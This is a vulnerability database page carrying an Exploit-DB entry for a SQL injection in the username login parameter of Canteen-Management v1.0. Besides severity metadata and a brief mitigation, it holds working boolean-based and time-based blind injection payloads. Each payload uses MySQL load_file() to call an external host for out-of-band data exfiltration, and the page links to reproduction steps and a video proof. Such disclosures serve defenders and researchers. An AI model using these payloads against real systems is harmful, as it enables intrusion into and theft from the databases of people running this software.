header-logo
Suggest Exploit
vendor:
Canteen-Management
by:
nu11secur1ty
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Canteen-Management
Affected Version From: Canteen-Management1.0-2022
Affected Version To: Canteen-Management1.0-2022
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2022

Canteen-Management v1.0 – SQL Injection

The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

## Exploit Title: Canteen-Management v1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)

## Proof and Exploit:
[href](https://streamable.com/vvz2lh)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR